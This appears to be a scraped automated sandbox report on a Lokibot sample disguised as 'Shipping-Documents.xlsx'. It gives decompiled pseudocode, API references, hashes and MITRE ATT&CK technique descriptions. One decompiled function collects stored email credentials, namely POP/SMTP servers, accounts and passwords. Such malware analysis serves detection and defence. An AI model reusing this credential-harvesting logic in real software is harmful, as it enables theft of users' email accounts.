APIs

PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 004044EE, Relevance: 1.3, APIs: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044EE(void* __ecx, void* __eflags, WCHAR* _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16) {
				intOrPtr _v8;
				void* _t25;
				void* _t28;
				long _t29;
				signed int _t36;
				void* _t45;
				signed int _t53;
				signed int _t55;
				signed int _t58;
				void* _t61;
				void* _t63;

				_t36 = 0x400;
				_t53 = 2;
				_t58 = 0x400;
				_t61 = E00402B7C( ~(0 | __eflags > 0x00000000) | 0x00000400 * _t53);
				if(_t61 == 0) {
					L4:
					_t25 = 0;
				} else {
					_v8 = 0x800;
					while(1) {
						E00402B4E(_t61, 0, _t58 + _t58);
						_t28 = E004044A7(_a8, _a12, _a16, _t61, _t58, _a4);
						_t13 = _t58 - 1; // 0x3ff
						_t63 = _t63 + 0x24;
						_t66 = _t28 - _t13;
						if(_t28 != _t13) {
							break;
						}
						_v8 = _v8 + 0x800;
						_t36 = _t36 + 0x400;
						E00402BAB(_t61);
						_t55 = 2;
						_t58 = _t36;
						_t61 = E00402B7C( ~(0 | _t66 > 0x00000000) | _t36 * _t55);
						if(_t61 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L5;
					}
					_t29 = GetLastError();
					_t45 = 2;
					__eflags = _t29 - _t45;
					if(_t29 != _t45) {
						_t25 = _t61;
					} else {
						E00402BAB(_t61);
						goto L4;
					}
				}
				L5:
				return _t25;
			}

0x004044f5
0x004044fe
0x00404501
0x00404512
0x00404517
0x0040457c
0x0040457c
0x00404519
0x00404519
0x00404520
0x00404527
0x0040453a
0x0040453f
0x00404542
0x00404545
0x00404547
0x00000000
0x00000000
0x00404549
0x00404550
0x00404557
0x00404562
0x00404565
0x00404574
0x0040457a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040457a
0x00404585
0x0040458d
0x0040458e
0x00404590
0x0040459b
0x00404592
0x00404593
0x00000000
0x00404598
0x00404590
0x0040457e
0x00404584

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

GetLastError.KERNEL32 ref: 00404585

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
String ID:
API String ID: 4065557613-0
Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40, Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = CloseHandle(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

SmtpAccount, xrefs: 0040D0FA
PopAccount, xrefs: 0040D0B6
PopPort, xrefs: 0040D0A7
PopPassword, xrefs: 0040D0D0
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099
SmtpPort, xrefs: 0040D0EB
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D
SmtpServer, xrefs: 0040D0DC

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040317B, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}

0x0040317f
0x00403180
0x00403180
0x00403180
0x0040318d
0x00403196
0x00403199
0x0040319b
0x004031a1
0x004031a9
0x004031ab
0x004031ac
0x004031ae
0x00000000
0x004031b0
0x004031b3
0x004031c2
0x004031c7
0x004031cd
0x004031e0
0x00000000
0x00000000
0x00000000
0x004031cd
0x004031d7
0x004031dd
0x004031cf
0x004031cf
0x004031d1
0x004031d5
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2182198196.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Shipping-Documents.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Shipping-Documents.xlsx"

Indicators

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre